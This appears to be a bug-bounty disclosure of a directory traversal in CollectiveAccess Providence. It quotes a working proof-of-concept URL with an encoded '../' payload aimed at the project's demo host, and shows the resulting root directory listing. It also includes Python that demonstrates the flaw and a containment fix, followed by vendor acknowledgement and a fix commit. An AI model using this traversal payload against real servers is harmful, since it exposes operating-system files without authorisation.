Partial Local file inclusion in collectiveaccess/providence

Valid

Reported on

May 25th 2023


Description

An authenticated user can supply a directory id that escapes the web application's intended folder context and list directories at the operating-system level.

To reproduce the issue, authenticate to the web application and open the following URL in the browser: https://demo.collectiveaccess.org/batch/MediaImport/GetDirectoryLevel?id=%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F&init=&start=0&max=100

The response to this request lists the contents of the / folder:


{"\/|6":{"001":{"item_id":"001","name":"001","fullname":"001","type":"DIR","children":1,"files":0,"subdirectories":1},"bin":{"item_id":"bin","name":"bin","fullname":"bin","type":"DIR","children":1161,"files":1161,"subdirectories":0},"boot":{"item_id":"boot","name":"boot","fullname":"boot","type":"DIR","children":22,"files":18,"subdirectories":4},"carleton":{"item_id":"carleton","name":"carleton","fullname":"carleton","type":"DIR","children":0,"files":0,"subdirectories":0},"data":{"item_id":"data","name":"data","fullname":"data","type":"DIR","children":86,"files":2,"subdirectories":84},"dev":{"item_id":"dev","name":"dev","fullname":"dev","type":"DIR","children":196,"files":176,"subdirectories":20},"dips":{"item_id":"dips","name":"dips","fullname":"dips","type":"DIR","children":4,"files":1,"subdirectories":3},"etc":{"item_id":"etc","name":"etc","fullname":"etc","type":"DIR","children":229,"files":109,"subdirectories":120},"home":{"item_id":"home","name":"home","fullname":"home","type":"DIR","children":12,"files":0,"subdirectories":12},"keybase":{"item_id":"keybase","name":"keybase","fullname":"keybase","type":"DIR","children":0,"files":0,"subdirectories":0},"lib":{"item_id":"lib","name":"lib","fullname":"lib","type":"DIR","children":43,"files":4,"subdirectories":39},"lib64":{"item_id":"lib64","name":"lib64","fullname":"lib64","type":"DIR","children":1433,"files":1360,"subdirectories":73},"magic":{"item_id":"magic","name":"magic","fullname":"magic","type":"FILE"},"media":{"item_id":"media","name":"media","fullname":"media","type":"DIR","children":0,"files":0,"subdirectories":0},"mnt":{"item_id":"mnt","name":"mnt","fullname":"mnt","type":"DIR","children":0,"files":0,"subdirectories":0},"nas":{"item_id":"nas","name":"nas","fullname":"nas","type":"DIR","children":22,"files":5,"subdirectories":17},"opt":{"item_id":"opt","name":"opt","fullname":"opt","type":"DIR","children":3,"files":0,"subdirectories":3},"proc":{"item_id":"proc","name":"proc","fullname":"proc","type":"DIR","children":316,"files":46,"subdirectories":270},"root":{"item_id":"root","name":"root","fullname":"root","type":"DIR","children":0,"files":0,"subdirectories":0},"run":{"item_id":"run","name":"run","fullname":"run","type":"DIR","children":51,"files":16,"subdirectories":35},"sbin":{"item_id":"sbin","name":"sbin","fullname":"sbin","type":"DIR","children":509,"files":509,"subdirectories":0},"srv":{"item_id":"srv","name":"srv","fullname":"srv","type":"DIR","children":0,"files":0,"subdirectories":0},"ssd":{"item_id":"ssd","name":"ssd","fullname":"ssd","type":"DIR","children":1,"files":0,"subdirectories":1},"sys":{"item_id":"sys","name":"sys","fullname":"sys","type":"DIR","children":11,"files":0,"subdirectories":11},"thunderbolt":{"item_id":"thunderbolt","name":"thunderbolt","fullname":"thunderbolt","type":"DIR","children":70,"files":16,"subdirectories":54},"tmp":{"item_id":"tmp","name":"tmp","fullname":"tmp","type":"DIR","children":44,"files":44,"subdirectories":0},"upload":{"item_id":"upload","name":"upload","fullname":"upload","type":"DIR","children":2,"files":0,"subdirectories":2},"usr":{"item_id":"usr","name":"usr","fullname":"usr","type":"DIR","children":12,"files":0,"subdirectories":12},"var":{"item_id":"var","name":"var","fullname":"var","type":"DIR","children":22,"files":0,"subdirectories":22},"web":{"item_id":"web","name":"web","fullname":"web","type":"DIR","children":86,"files":2,"subdirectories":84},"_primaryKey":"name","_itemCount":60}}

Impact

Exploitation of this vulnerability could result in access to OS-level resources.
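The traversal above comes down to the directory id being joined onto the import base directory without a containment check. The following is an added example, not Providence's own PHP code; the base directory is a constructed placeholder. It decodes the report's id parameter as the framework would, shows how a naive join collapses it to /, the containment check that rejects it, and a simple flag for reviewing access logs.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Directory the import browser is meant to expose (constructed placeholder,
# not Providence's real configuration).
BASE_DIR = "/srv/providence/import"

# The proof-of-concept URL quoted in the report.
POC_URL = ("https://demo.collectiveaccess.org/batch/MediaImport/GetDirectoryLevel"
           "?id=%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2F&init=&start=0&max=100")


def directory_id_from_url(url):
    """Return the 'id' query parameter as the application sees it (percent-decoded)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["id"][0]


def vulnerable_directory_level(base_dir, item_id):
    """Naive join: posixpath.join discards base_dir when item_id starts with '/',
    and normpath then collapses the '..' segments up to the filesystem root."""
    return posixpath.normpath(posixpath.join(base_dir, item_id))


def resolve_directory_id(base_dir, item_id):
    """Resolve item_id inside base_dir; return None if it would escape.

    The id is forced to be relative (leading '/' stripped) and normalised, then
    containment is checked with commonpath rather than a string-prefix test, so
    '/srv/providence/import-other' is not mistaken for a child of the base.
    """
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(posixpath.join(base, item_id.lstrip("/")))
    if posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def looks_like_traversal(item_id):
    """Log-review helper: flag ids that are absolute or contain a '..' segment."""
    segments = item_id.replace("\\", "/").split("/")
    return item_id.startswith("/") or ".." in segments


if __name__ == "__main__":
    payload = directory_id_from_url(POC_URL)
    print("decoded id:", payload)
    print("naive join resolves to:", vulnerable_directory_level(BASE_DIR, payload))
    print("hardened resolve returns:", resolve_directory_id(BASE_DIR, payload))
    print("flagged for review:", looks_like_traversal(payload))
```

In production the containment check should be repeated on the real path of the candidate (after symlink resolution), so that a symlink inside the base directory cannot point outside it.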

We are processing your report and will contact the collectiveaccess/providence team within 24 hours. 4 months ago
We have contacted a member of the collectiveaccess/providence team and are waiting to hear back 4 months ago
CollectiveAccess validated this vulnerability 4 months ago

Wow, thanks for raising this one. I can't believe we missed it. Will push a fix for it later today.

TheLabda has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
CollectiveAccess marked this as fixed in develop with commit 6afb98 4 months ago
CollectiveAccess has been awarded the fix bounty
This vulnerability will not receive a CVE
CollectiveAccess published this vulnerability 4 months ago